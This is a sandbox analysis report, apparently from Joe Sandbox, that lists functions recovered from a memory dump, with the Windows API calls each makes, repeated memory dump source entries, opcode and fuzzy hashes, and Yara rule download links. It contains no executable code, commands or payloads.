                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: IconLoad
                                                                                                                                                          • String ID: blank$info$question$stop$warning
                                                                                                                                                          • API String ID: 2457776203-404129466
                                                                                                                                                          • Opcode ID: b2f4668f53dd2b3159e0f169e34d631b1be59f40d319f56cd57ff0192369d655
                                                                                                                                                          • Instruction ID: cbc20d25aa0ebabefed0065c94c3f22c3048ff1c6a65aef7395f083bef35c84a
                                                                                                                                                          • Opcode Fuzzy Hash: b2f4668f53dd2b3159e0f169e34d631b1be59f40d319f56cd57ff0192369d655
                                                                                                                                                          • Instruction Fuzzy Hash: 1111EC36248342BAD7055B54DC62DAE77ACDF27724B20003EF901A67C2F7B4BA504165
                                                                                                                                                          Function 0016757B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 00167595
                                                                                                                                                          • LoadStringW.USER32(00000000), ref: 0016759C
                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 001675B2
                                                                                                                                                          • LoadStringW.USER32(00000000), ref: 001675B9
                                                                                                                                                          • _wprintf.LIBCMT ref: 001675DF
                                                                                                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 001675FD
                                                                                                                                                          Strings
                                                                                                                                                          • %s (%d) : ==> %s: %s %s, xrefs: 001675DA
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                          • API String ID: 3648134473-3128320259
                                                                                                                                                          • Opcode ID: 84774bf08734cd33a11fe09b3f3cabe3f21f2dbd16c5f1c97cd783c0ff832884
                                                                                                                                                          • Instruction ID: cfb774cf69e887e5381fc58f8838be0e2a79d83e09c54c16ed55669a3e87bcff
                                                                                                                                                          • Opcode Fuzzy Hash: 84774bf08734cd33a11fe09b3f3cabe3f21f2dbd16c5f1c97cd783c0ff832884
                                                                                                                                                          • Instruction Fuzzy Hash: 24011DF2900208BFEB11A7A4ED89EEB776CDB09305F4044A6B746E2451EB749EC48B75
                                                                                                                                                          Function 00179A66 Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • select.WS2_32 ref: 00179B38
                                                                                                                                                          • WSAGetLastError.WS2_32(00000000), ref: 00179B45
                                                                                                                                                          • __WSAFDIsSet.WS2_32(00000000,?), ref: 00179B6F
                                                                                                                                                          • WSAGetLastError.WS2_32(00000000), ref: 00179B9F
                                                                                                                                                          • htons.WS2_32(?), ref: 00179C51
                                                                                                                                                          • inet_ntoa.WS2_32(?), ref: 00179C0C
                                                                                                                                                            • Part of subcall function 0015E0F5: _strlen.LIBCMT ref: 0015E0FF
                                                                                                                                                            • Part of subcall function 0015E0F5: _memmove.LIBCMT ref: 0015E121
                                                                                                                                                          • _strlen.LIBCMT ref: 00179CA7
                                                                                                                                                          • _memmove.LIBCMT ref: 00179D10
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3637404534-0
                                                                                                                                                          • Opcode ID: 801859e343eb5faa5b32aa7a06a8df009604f6a5d3a922e99da6e88c21403c09
                                                                                                                                                          • Instruction ID: 49701a1d7bf49ab6ebdb6b3762c0b72c8e8a1856b65b7d89db7e52bfa2f11791
                                                                                                                                                          • Opcode Fuzzy Hash: 801859e343eb5faa5b32aa7a06a8df009604f6a5d3a922e99da6e88c21403c09
                                                                                                                                                          • Instruction Fuzzy Hash: AB81CE72504200ABD714EF64DC85E6BB7F8EF99724F10861DF55A9B2A1EB30DD08CB92
                                                                                                                                                          Function 0014B72C Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • __mtinitlocknum.LIBCMT ref: 0014B744
                                                                                                                                                            • Part of subcall function 00148A0C: __FF_MSGBANNER.LIBCMT ref: 00148A21
                                                                                                                                                            • Part of subcall function 00148A0C: __NMSG_WRITE.LIBCMT ref: 00148A28
                                                                                                                                                            • Part of subcall function 00148A0C: __malloc_crt.LIBCMT ref: 00148A48
                                                                                                                                                          • __lock.LIBCMT ref: 0014B757
                                                                                                                                                          • __lock.LIBCMT ref: 0014B7A3
                                                                                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,001D6948,00000018,00156C2B,?,00000000,00000109), ref: 0014B7BF
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(8000000C), ref: 0014B7DC
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(8000000C), ref: 0014B7EC
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1422805418-0
                                                                                                                                                          • Opcode ID: d5cb9d9adc7e4cd71d8fdad5ef76c49358706a9b368165b3c9fdd237812bee52
                                                                                                                                                          • Instruction ID: 065e0664fcce3eb01827df168bccc6c43b5616bc40edbce089b9c96e6a13f443
                                                                                                                                                          • Opcode Fuzzy Hash: d5cb9d9adc7e4cd71d8fdad5ef76c49358706a9b368165b3c9fdd237812bee52
                                                                                                                                                          • Instruction Fuzzy Hash: 1B413AB1D086168BEB149FB8D8C436CB7B4BF55339F114219E429AB6F1C774D891CB90
                                                                                                                                                          Function 0016A1B7 Relevance: 12.1, APIs: 8, Instructions: 100fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 0016A1CE
                                                                                                                                                            • Part of subcall function 0014010A: std::exception::exception.LIBCMT ref: 0014013E
                                                                                                                                                            • Part of subcall function 0014010A: __CxxThrowException@8.LIBCMT ref: 00140153
                                                                                                                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 0016A205
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 0016A221
                                                                                                                                                          • _memmove.LIBCMT ref: 0016A26F
                                                                                                                                                          • _memmove.LIBCMT ref: 0016A28C
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 0016A29B
                                                                                                                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 0016A2B0
                                                                                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0016A2CF
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 256516436-0
                                                                                                                                                          • Opcode ID: d7e1c9498783ad9eb65dffc18cb18147b743c31ba809625aeac0924f417bbcde
                                                                                                                                                          • Instruction ID: d453c15967d319ce9c32d076ab03db0a85a3bf378b19710b8952a44415838186
                                                                                                                                                          • Opcode Fuzzy Hash: d7e1c9498783ad9eb65dffc18cb18147b743c31ba809625aeac0924f417bbcde
                                                                                                                                                          • Instruction Fuzzy Hash: 1031E231A00105EBCF00DFA5DC85AAEB7B8FF49710F1080AAF901AB256DB70DE55CBA1
                                                                                                                                                          Function 00188CDB Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00188CF3
                                                                                                                                                          • GetDC.USER32(00000000), ref: 00188CFB
                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00188D06
                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00188D12
                                                                                                                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00188D4E
                                                                                                                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00188D5F
                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00188D99
                                                                                                                                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00188DB9
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3864802216-0
                                                                                                                                                          • Opcode ID: d495e065701ed9a5b20daa6a02ae42d208cc5bd8ef9d00a796ff8134b7d35769
                                                                                                                                                          • Instruction ID: 2d205b9d530e37e5e4ec581427f75d31740df328dbd397e6c8db4ad0b922d328
                                                                                                                                                          • Opcode Fuzzy Hash: d495e065701ed9a5b20daa6a02ae42d208cc5bd8ef9d00a796ff8134b7d35769
                                                                                                                                                          • Instruction Fuzzy Hash: B8319C72200610BFEB109F50DC8AFEA3BA9EF4A711F044155FE09DA591CBB59D81CB70
                                                                                                                                                          Function 0016C890 Relevance: 10.8, APIs: 7, Instructions: 316COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0016C6A0: __time64.LIBCMT ref: 0016C6AA
                                                                                                                                                            • Part of subcall function 001241A7: _fseek.LIBCMT ref: 001241BF
                                                                                                                                                          • __wsplitpath.LIBCMT ref: 0016C96F
                                                                                                                                                            • Part of subcall function 0014297D: __wsplitpath_helper.LIBCMT ref: 001429BD
                                                                                                                                                          • _wcscpy.LIBCMT ref: 0016C982
                                                                                                                                                          • _wcscat.LIBCMT ref: 0016C995
                                                                                                                                                          • __wsplitpath.LIBCMT ref: 0016C9BA
                                                                                                                                                          • _wcscat.LIBCMT ref: 0016C9D0
                                                                                                                                                          • _wcscat.LIBCMT ref: 0016C9E3
                                                                                                                                                            • Part of subcall function 0016C6E4: _memmove.LIBCMT ref: 0016C71D
                                                                                                                                                            • Part of subcall function 0016C6E4: _memmove.LIBCMT ref: 0016C72C
                                                                                                                                                          • _wcscmp.LIBCMT ref: 0016C92A
                                                                                                                                                            • Part of subcall function 0016CE59: _wcscmp.LIBCMT ref: 0016CF49
                                                                                                                                                            • Part of subcall function 0016CE59: _wcscmp.LIBCMT ref: 0016CF5C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _wcscat_wcscmp$__wsplitpath_memmove$__time64__wsplitpath_helper_fseek_wcscpy
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1017551523-0
                                                                                                                                                          • Opcode ID: a4217373fd13feae707b71f7a3c799399962729ff6fa37ac9c14cfc7a7ca5ba6
                                                                                                                                                          • Instruction ID: e42ca592b63009ce5d2bbe6257fbeda06c678a26265fc7b2a7828e39e611f532
                                                                                                                                                          • Opcode Fuzzy Hash: a4217373fd13feae707b71f7a3c799399962729ff6fa37ac9c14cfc7a7ca5ba6
                                                                                                                                                          • Instruction Fuzzy Hash: D3C14CB1900129AECF14DFA5CC81EEEB7B9EF59310F0040AAF609E7151D7709A94CFA1
                                                                                                                                                          Function 0013B40F Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 35bd0bc73952d9b347ac0e95a7f93e0cc71670885b7e47083c2583522148818e
                                                                                                                                                          • Instruction ID: c35211e3e582d2465d9a065ecf5c46e0fe1fd76e316a5ce320566c640888fb29
                                                                                                                                                          • Opcode Fuzzy Hash: 35bd0bc73952d9b347ac0e95a7f93e0cc71670885b7e47083c2583522148818e
                                                                                                                                                          • Instruction Fuzzy Hash: F2715A71904509FFCF04CF98CD88ABEBB74FF85314F248159FA16AA251D734AA52CBA4
                                                                                                                                                          Function 00182121 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • _memset.LIBCMT ref: 0018214B
                                                                                                                                                          • _memset.LIBCMT ref: 00182214
                                                                                                                                                          • ShellExecuteExW.SHELL32(?), ref: 00182259
                                                                                                                                                            • Part of subcall function 001284A6: __swprintf.LIBCMT ref: 001284E5
                                                                                                                                                            • Part of subcall function 001284A6: __itow.LIBCMT ref: 00128519
                                                                                                                                                            • Part of subcall function 00123BCF: _wcscpy.LIBCMT ref: 00123BF2
                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00182320
                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 0018232F
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                                                                                          • String ID: @
                                                                                                                                                          • API String ID: 4082843840-2766056989
                                                                                                                                                          • Opcode ID: 31d472962a3935648f782312e8f85526e447483bd82a61057bfb3535e1eb1e86
                                                                                                                                                          • Instruction ID: 4219469813e85f59fdc6dc93487300eb37efbab5766be865ba26c502e17ff1a0
                                                                                                                                                          • Opcode Fuzzy Hash: 31d472962a3935648f782312e8f85526e447483bd82a61057bfb3535e1eb1e86
                                                                                                                                                          • Instruction Fuzzy Hash: 13718971A00629DFCB05EFA4D895AAEBBF5FF58310F108059E856AB351DB34AE50CF90
                                                                                                                                                          Function 001647DE Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetParent.USER32(?), ref: 0016481D
                                                                                                                                                          • GetKeyboardState.USER32(?), ref: 00164832
                                                                                                                                                          • SetKeyboardState.USER32(?), ref: 00164893
                                                                                                                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 001648C1
                                                                                                                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 001648E0
                                                                                                                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00164926
                                                                                                                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00164949
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
